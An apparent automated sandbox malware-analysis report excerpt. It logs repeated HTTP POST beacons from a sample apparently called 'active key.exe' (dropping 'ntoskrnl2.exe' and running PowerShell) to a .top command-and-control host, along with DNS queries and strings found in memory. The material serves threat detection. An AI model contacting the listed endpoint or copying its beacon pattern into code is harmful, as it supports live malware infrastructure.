                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1016Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1312Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1324Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1024Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: keyauth.win
                    Source: global trafficDNS traffic detected: DNS query: 128538cm.n9shteam3.top
                    Source: unknownHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                    Source: powershell.exe, 0000001D.00000002.3765455976.00000293A57F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                    Source: powershell.exe, 00000025.00000002.3755191167.00000233FA7B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsJ
                    Source: ntoskrnl2.exe, 00000005.00000002.2300166294.0000000000B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                    Source: powershell.exe, 00000022.00000002.3519140010.00000160BBB44000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.3492498621.00000200716E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3513125242.00000233F23B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000024.00000002.3680216370.00000200798D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://osoft.co
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: active key.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
                    Source: active key.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsusersIncIEEERootCA.cr
                    Source: active key.exeString found in binary or memory: http://pki-ocsp.symauth.com0
                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: ntoskrnl2.exe, 00000005.00000002.2301243668.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.2419074977.0000015C39671000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D281000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226581C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABAD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200615D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2341000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 0000001C.00000002.2419074977.0000015C39898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.2418135775.000002938D4A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2424294676.00000226583E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2420204776.00000160ABCF9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2423438282.00000200617F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000025.00000002.2423349064.00000233E2568000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 0000001C.00000002.3723545996.0000015C51A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.3653818428.000002267029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 0000001C.00000002.3742689311.0000015C51A84000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                    Source: powershell.exe, 00000022.00000002.3806662276.00000160C3F79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
